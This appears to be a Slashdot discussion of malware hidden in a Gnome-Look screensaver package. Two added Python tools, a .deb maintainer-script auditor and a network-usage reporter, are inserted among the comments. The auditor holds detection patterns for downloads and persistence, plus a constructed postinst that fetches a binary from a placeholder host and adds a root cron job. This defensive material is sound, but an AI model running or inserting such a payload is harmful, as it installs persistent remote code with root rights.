Malware Found Hidden In Screensaver On Gnome-Look
AndGodSed writes "OMG! Ubuntu! reports the following: 'Malware has been found hidden inside an innocuous 'waterfall' screensaver .deb file made available on the popular artwork sharing site Gnome-Look.org. The .deb file installs a script with elevated privileges designed to perform a DDoS attack as well as keep itself updated via downloads. The dodgy screensaver in question has since been removed from gnome-look, and this incident was a very basic, if potentially successful, attempt.'" A similar report at Digitizor.com says that similar malware was also found in a theme called Ninja Black. For those affected, both sites also provide instructions on cleansing your system.
Re:Not more safe (Score:5, Interesting)
It looks like it's following the same pattern as Windows malware, too: make a cool screensaver, post it to sharing sites, hope people tell their friends about it. That was a common malware vector for Windows in the early part of this decade. Next there'll be dodgy "codecs" on pr0n sites, and once people start using malware scanners for Linux, they'll make dodgy fake antivirus software to con gullible users. Netbooks may be great for attracting attention to Linux, but we have to remember that this will include the kind of attention that no one wants.
Re:Not more safe (Score:5, Interesting)
You kind of have a point, but the fact is, you need root privileges to install a .deb, and I have quite successfully installed gtk/gtk2 themes/icons/etc. without admin privileges. If I downloaded a .deb from a random site and then installed it, it would be just like running a .exe on Windows, but for most things I need to do on Linux, I don't actually have to take that risk, while on Windows it seems everything is a .exe. Not sure about screensavers, but it seems this was, like 90% of viruses for any platform, a hack relying on stupid users elevating the virus to root authority themselves.
Repositories are getting a lot better too. I don't use Ubuntu any more, but when I left, PPAs were in the ascendancy, which seemed to allow much better enforcement of security while still letting third-party stuff in.
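The point above about root being needed for a .deb is worth making concrete: what runs as root is whatever preinst/postinst/prerm/postrm scripts the packager put in the package's control tarball, and dpkg runs them before you get any say. The following is an added example, not code from the thread, from gnome-look or from the screensaver package. It parses the .deb's 'ar' container and control tarball with the Python standard library only, so nothing inside the package is executed, and it flags lines a reviewer should read by hand. The regex heuristics are constructed, and so is the demo package built at the bottom; its postinst payload is illustrative and is not the real gnome-look script.

```python
"""Look at a .deb's maintainer scripts before handing it to dpkg.

Added example: parses the ar container and control.tar.* with the standard
library only, so nothing from the package is executed. The SUSPICIOUS
patterns and the demo package are constructed for the demo; the demo postinst
is illustrative, not the real gnome-look payload.
"""
import io
import re
import tarfile

MAINTAINER_SCRIPTS = ("preinst", "postinst", "prerm", "postrm")

# (regex, reason) pairs; constructed heuristics, not exhaustive.
SUSPICIOUS = [
    (r"\b(wget|curl)\b", "downloads content at install time"),
    (r"/etc/(cron\.\w+|init\.d|rc\d?\.d)", "installs persistence"),
    (r"\bchmod\s+(?:[0-7]*[4-7][0-7]{3}|[ugoa]*\+\w*s)\b", "sets setuid/setgid bits"),
    (r"\|\s*(sh|bash)\b", "pipes data into a shell"),
    (r"\bbase64\s+(-d|--decode)\b", "decodes a hidden payload"),
]


def ar_members(blob):
    """Yield (name, data) for every member of an 'ar' archive (the .deb container)."""
    if blob[:8] != b"!<arch>\n":
        raise ValueError("not an ar archive, so not a .deb")
    pos = 8
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]
        if hdr[58:60] != b"`\n":
            raise ValueError("corrupt ar member header")
        name = hdr[:16].decode("ascii").rstrip(" /")   # GNU 'name/' or BSD 'name ' style
        size = int(hdr[48:58].decode("ascii").strip())
        yield name, blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size & 1)                 # members are padded to even offsets


def maintainer_scripts(deb_bytes):
    """Return {script_name: text} for the scripts dpkg would run as root."""
    scripts = {}
    for name, data in ar_members(deb_bytes):
        if not name.startswith("control.tar"):
            continue
        with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
            for member in tf.getmembers():
                base = member.name.lstrip("./")
                if member.isfile() and base in MAINTAINER_SCRIPTS:
                    scripts[base] = tf.extractfile(member).read().decode("utf-8", "replace")
    return scripts


def audit(deb_bytes):
    """Return (script, line_no, reason, line) for every suspicious script line."""
    findings = []
    for script, text in sorted(maintainer_scripts(deb_bytes).items()):
        for lineno, line in enumerate(text.splitlines(), 1):
            for pattern, reason in SUSPICIOUS:
                if re.search(pattern, line):
                    findings.append((script, lineno, reason, line.strip()))
    return findings


def _tar_gz(files):
    """Build a gzipped tar of {name: bytes} in memory (demo packaging helper)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for name, content in files.items():
            info = tarfile.TarInfo("./" + name)
            info.size, info.mode = len(content), 0o755
            tf.addfile(info, io.BytesIO(content))
    return buf.getvalue()


def build_sample_deb(postinst):
    """Construct a minimal .deb around the given postinst text (demo only)."""
    control = _tar_gz({
        "control": b"Package: waterfall-demo\nVersion: 0.1\nArchitecture: all\n"
                   b"Maintainer: demo <demo@example.invalid>\nDescription: constructed demo\n",
        "postinst": postinst.encode(),
    })
    data = _tar_gz({"usr/share/doc/waterfall-demo/README": b"constructed demo package\n"})
    out = bytearray(b"!<arch>\n")
    for name, body in (("debian-binary", b"2.0\n"), ("control.tar.gz", control), ("data.tar.gz", data)):
        out += f"{name + '/':<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(body):<10}`\n".encode("ascii")
        out += body + (b"\n" if len(body) & 1 else b"")
    return bytes(out)


# Constructed demo payload: downloads a binary and adds a cron entry as root.
DEMO_POSTINST = """#!/bin/sh
set -e
# constructed demo payload, NOT the real gnome-look script
wget -q -O /usr/bin/.run-cron http://updates.example.invalid/run
chmod 755 /usr/bin/.run-cron
echo "* * * * * root /usr/bin/.run-cron" > /etc/cron.d/update-check
exit 0
"""

if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_deb(DEMO_POSTINST)
    findings = audit(blob)
    for script, lineno, reason, line in findings:
        print(f"{script}:{lineno}: {reason}: {line}")
    print(f"{len(findings)} suspicious line(s); read the scripts yourself before installing")
```

Run it with a downloaded .deb as the argument; with no argument it audits the constructed demo package. The heuristics only decide which lines to look at first: a clean report is not a clean package, which is why the script prints the script names and tells you to read them.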
Re:Not more safe (Score:3, Interesting)
Any (good) Linux sysadmin knows that there have been many Linux worms in history. Yes, history. You're also referring to a 2003 Windows worm here.
Conficker aside, such worms are pretty much history. Most malware nowadays comes via trojans, and no OS can protect against that unless it's totally locked down (like the iPhone).
Re:Not more safe (Score:5, Interesting)
Except one would hope that you could trust what you get from a site like this. Not everyone can scour the source/binary of every app they get from a 'trusted' site.
And if you can't trust the 'trusted' sites for the free stuff, then the entire FreeOS movement is dead in its tracks.
Re:Not more safe (Score:3, Interesting)
There's a middle ground that can maximize protection against trojans (of course, nothing can protect against completely unwary users), and that's using a model where untrusted apps are (whether by running through app-specific accounts or otherwise) required to be given fairly finely grained permissions on installation before accessing resources.
While Linux distros provided somewhat more protection against users being unknowingly tricked into performing dangerous tasks, by providing elegant, non-intrusive ways to give users the control they need without always running as a superuser, before Windows did much in that regard, it shares with Windows a fairly all-or-nothing security model in many regards that is particularly susceptible to trojans.
Re:Not more safe (Score:3, Interesting)
And thus you raise the threshold for entry for new third-party software.
Re:Not more safe (Score:5, Interesting)
Here's an idea. Feel free to agree, disagree, tear it apart, whatever...
Why not have a kernel network access logging module with a userland process that periodically reports to users which programs are accessing the TCP/IP network? Say once a week or once a month or something. The number of programs that do this for many users is quite low. Probably Firefox, Thunderbird, Opera, uTorrent, a short list of other programs. Users then have an opportunity to ignore those programs on future reports. Users now have a good idea if there are changes to their system that might affect security.
There would still be opportunity for malware to access the internet, but users would either 1) notice it or 2) it would make the malware work in very complicated, noticeable ways (like uploading data to a website using a URL).
Re:Not more safe (Score:4, Interesting)
Actually it would really suck if Windows had just one Microsoft verified "app store" where everything is controlled like with iPhone.
Yes it would, and in this world I would add the Google repository, and perhaps the Apple repository. Anyone could set up a repository (same as you can with Debian) and sign their packages, but if they got compromised, or let crap in, then I'd be wary of using them in the future.
The problem with the iPhone App Store is there's only one. You can't add a competitor's.
Re:Repositories! (Score:3, Interesting)
The inherent problem with the iPhone is that you can only go to one store to buy apps (namely iTunes). With repos you can pick and choose which stores you trust and which you don't. Much like how I choose if I want to buy software from BigBoxMart or BestStolen. The Internet in general could (since I am using a store analogy apparently) be seen as buying stuff off the street. Yeah, the stuff looks cool, and at these bargain prices you can't beat it. But I do need to exercise some caution when I flash my wallet to some guy hanging out the back of a van.
So yes, I agree, I'm not too hip on the one-store-to-rule-them-all policy. But I do believe that the store concept actually has some utility to offer if given the ability to go to another store should I so choose later. I obviously don't want to exclude the random vendor on the street that is selling hand-made crafts, or even the random kiosk by the bus stop selling phones. I do, however, want to keep in mind the burly looking thug over there selling "Snoby" radios. I think it is all a matter of getting people to get inside a way of thinking.
To me, and that only applies to me, Mac OS X screams "Hey, buy more shiny Apple stuff" (security by insulating oneself by coolness). Linux says to me "Hey, subscribe to a repo because we are always changing stuff and you want to have the latest build." (security by trust of subscription [or maybe sheer geekness]). Windows just looks like, "Hey, we're cool with everyone, you want herpes? No problem, we're cool with that. Want to do really neat spreadsheets? We're cool with that too." (insecurity by being a software whore; we're just trying to please everyone.)
Re:Not more safe (Score:2, Interesting)
Both. You are imagining a false dichotomy where there is none.
Getting as much of the 3rd party software as possible into the repository does not preclude raising the threshold of entry.
Some software you want to fall below the threshold is no-name drive-by malware.
Re:Not more safe (Score:2, Interesting)
So what? On my system any script or program cannot be executed without my knowledge. Programs cannot access outside of specific directories. They are totally ironed and sealed from each other.
Example: I cannot even open a picture from any other directory than the ~/Pictures directory. And the only application that can do that is Gwenview.
The only place to run any script (or binary executable) is from ~/bin, but it first needs to be profiled to do so. So I can copy whatever binaries to that directory and they cannot be executed if I do not give permission first from the admin profile.
Re:Not more safe (Score:2, Interesting)
The argument is still the same. I'd rather be able to tell someone who can that they may than tell them they may not.
Anyone can try to fix it. Some may be better than others, but that doesn't preclude someone from trying. Whereas, on competing systems you may not.
This argument is starting to look stupid, especially in a story like this.
Any software that I use has to be made by someone I trust, there is no escape from that, no "but the source is available". I have to trust the maker.
And giving excuses instead of assuming responsibility is not going to gain my trust. There have to be concrete steps to assure this does not happen again. No excuses.
Re:At least it was fixable. (Score:4, Interesting)
And saying the problem is not in the kernel but in the software applications doesn't cut it either. The same could be said for many of the Windows issues; it's just that the software applications in question are in every install and part of the Windows user environment. It's no different from applications that might be part of the Ubuntu user environment (GNOME, Samba, etc.).
Phil
Re:At least it was fixable. (Score:3, Interesting)
To refute your point: Malware can get its hooks into Windows in a variety of different ways, and removal often requires specialized tools. For example, I had to remove one of those hideous fake-antivirus programs from a neighbor's computer. Real antivirus was no help. MalwareBytes Anti-malware couldn't get rid of it. Going into Safe Mode and manually cleaning things out didn't even work. I had to search the Internet and use a specialized tool to finally uproot that crap. (And, while I trusted it, the removal tool could have also been malware, I had no way to tell)
So: Linux gets infected, smart user can eliminate it. Windows gets infected, smart user still needs to rely on either antivirus or malware-specific removal tools.
Re:Not more safe (Score:5, Interesting)
My mother managed to get some nearly-impossible-to-remove scareware on her (Windows) netbook. She swears up and down that she never visited any sketchy sites, had AV (but no anti-malware), etc. She was basically using it for several things:
1) Visiting various newspapers' websites
2) Webmail (a dedicated server for her business)
3) Word processing (OpenOffice.org)
4) Spider Solitaire
5) A few online games (jigsaw puzzles, sudoku, presumably flash-based) she found on Google. I think this is the most likely vector, but she uses the same websites all the time.
6) Visiting certain reputable, ad-free (AFAIK) sites.
She is smart enough to never download/run/open suspicious programs/files/etc. and she was using Firefox 3.5. This thing was able to prevent itself from being uninstalled easily. On Linux, she could have simply killed any offending processes (OK, that's nontrivial, but no root permissions needed in theory) and checked the (graphical, so-easy-to-use-a-caveman^H^Hgrandma-could-do-it) Gnome startup programs tool for suspicious entries. On Windows, we eventually had to use "System Restore" (an OS feature) -- which the program could potentially have disabled had the malware author thought to do so (it was totally rooted -- the malware was preventing the installation of some anti-malware programs) and then download the anti-malware program that had previously failed to install. Windows Vista/7 are probably more secure than XP, which she has, but I'm still reluctant to blame all Windows security issues on user stupidity. Now I have her running Firefox+NoScript so that it (hopefully) won't happen again, but that's mostly because she refuses to switch to Linux. Most users would be running IE7 or so... not Firefox+NoScript. This is clearly not just "user stupidity" -- it's a Windows genuine advantage^H^Hbug.
Re:Removal instructions from the site (Score:2, Interesting)
The only cure is education.
Wait, what? Slashdot keeps telling me the user is not a factor in malware infections, so how will "education" help?
Re:Not more safe (Score:5, Interesting)
No, even the iPhone has vulnerabilities. Locking down a system does not fix vulnerabilities, it only hides them from public view. An open system is more secure, as everyone knows when a vulnerability is discovered and sysadmins can make workarounds (or even pull the system down) until a patch is developed. With a closed system there is less chance of an exploited vulnerability being discovered by the people who want to fix it or are affected by it.
Re:Not more safe (Score:3, Interesting)
/etc might not be the same as the Windows registry (I agree with this statement; /etc is much more manageable), but the gconf registry is looking more and more like it every month. You can say GNOME isn't an integral part of Linux, but it's installed on the majority of end-user systems nowadays, so for these purposes, it pretty much is...
Re:Linux needs a "Zone Alarm" like program (Score:2, Interesting)
I suspect the GP is talking about the interactive features of Zone Alarm. My understanding is that it only allows outgoing network traffic from known executables that the user has allowed. If an executable hasn't requested network access before, or if an executable that previously asked for access and was granted it but has now been modified (an upgrade/overwritten by malware/...) then Zone Alarm will ask the user again if network access should be granted. It also notes that the executable has previously asked for access and that the file has changed since the last access. L7 filtering is a good start, but it's the user interaction at the time of network access that makes Zone Alarm really useful.
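Two comments in this thread describe essentially the same userland tool: the proposal earlier for a kernel network logger plus a process that periodically reports which programs used TCP/IP (with an ignore list the user builds up), and the ZoneAlarm behaviour just described, where an allowed executable that has since changed on disk is reported again. The following is an added example of that reporting logic, not code from the thread, from ZoneAlarm or from any distribution. It assumes the logger emits one line per connection in the constructed format parsed by EVENT_RE (timestamp, pid, executable path, sha256 of the executable, destination) and that the user's decisions are kept as a dict {exe_path: sha256_of_exe_when_approved}. The sample log, hashes, paths and addresses are all constructed.

```python
"""Periodic 'which programs used the network' report with binary-change checks.

Added example, not code from the thread, ZoneAlarm or any distro. Assumes a
logger that writes one line per connection in the EVENT_RE format below and a
dict of approved executables keyed by path, valued by the sha256 the user saw
when approving. All sample data at the bottom is constructed.
"""
import hashlib
import re
from collections import defaultdict

EVENT_RE = re.compile(
    r"^(?P<ts>\S+) pid=(?P<pid>\d+) exe=(?P<exe>\S+) "
    r"sha256=(?P<sha>[0-9a-f]{64}) dst=(?P<dst>\S+)$"
)


def parse_events(lines):
    """Parse logger output; malformed lines are skipped rather than fatal."""
    events = []
    for line in lines:
        m = EVENT_RE.match(line.strip())
        if m:
            events.append(m.groupdict())
    return events


def hash_exe(path):
    """sha256 of an executable on disk: what a real logger/approver would record."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def classify(events, approved):
    """Bucket every exe seen in the window as approved, changed (the binary's hash
    differs from the one the user allowed) or new (never approved); values are
    the sorted destinations it contacted."""
    dests = defaultdict(set)
    hashes = defaultdict(set)
    for ev in events:
        dests[ev["exe"]].add(ev["dst"])
        hashes[ev["exe"]].add(ev["sha"])
    report = {"new": {}, "changed": {}, "approved": {}}
    for exe, seen in hashes.items():
        if exe not in approved:
            bucket = "new"
        elif seen == {approved[exe]}:
            bucket = "approved"
        else:
            bucket = "changed"   # overwritten by an upgrade, or by something else
        report[bucket][exe] = sorted(dests[exe])
    return report


def approve(approved, exe, sha):
    """The user's 'ignore this one from now on', bound to one specific binary."""
    approved[exe] = sha
    return approved


def render(report):
    """Plain-text report with new and changed entries first."""
    lines = []
    for bucket in ("new", "changed", "approved"):
        for exe, dsts in sorted(report[bucket].items()):
            lines.append(f"[{bucket:8}] {exe} -> {', '.join(dsts)}")
    return "\n".join(lines)


# Constructed sample data: placeholder hashes, made-up paths and addresses.
H_FIREFOX = hashlib.sha256(b"constructed firefox binary").hexdigest()
H_TBIRD = hashlib.sha256(b"constructed thunderbird binary").hexdigest()
H_TBIRD_NEW = hashlib.sha256(b"constructed thunderbird binary, overwritten").hexdigest()
H_UNKNOWN = hashlib.sha256(b"constructed unknown binary").hexdigest()

SAMPLE_APPROVED = {"/usr/bin/firefox": H_FIREFOX, "/usr/bin/thunderbird": H_TBIRD}
SAMPLE_LOG = [
    f"2009-12-09T10:00:01 pid=4312 exe=/usr/bin/firefox sha256={H_FIREFOX} dst=93.184.216.34:443",
    f"2009-12-09T10:05:40 pid=4312 exe=/usr/bin/firefox sha256={H_FIREFOX} dst=198.51.100.7:80",
    f"2009-12-09T11:00:00 pid=5120 exe=/usr/bin/thunderbird sha256={H_TBIRD_NEW} dst=192.0.2.25:993",
    f"2009-12-09T11:30:00 pid=5333 exe=/usr/bin/.screensaver-update sha256={H_UNKNOWN} dst=203.0.113.9:6667",
    "truncated line the parser must tolerate",
]

if __name__ == "__main__":
    print(render(classify(parse_events(SAMPLE_LOG), SAMPLE_APPROVED)))
```

Keying approval on the executable's hash rather than its path is the part that matters: a path-only ignore list would silently keep trusting /usr/bin/thunderbird after something overwrote it, which is exactly the case the ZoneAlarm description calls out. The cost is that every legitimate package upgrade re-prompts once; the approve() call is the user accepting the new hash.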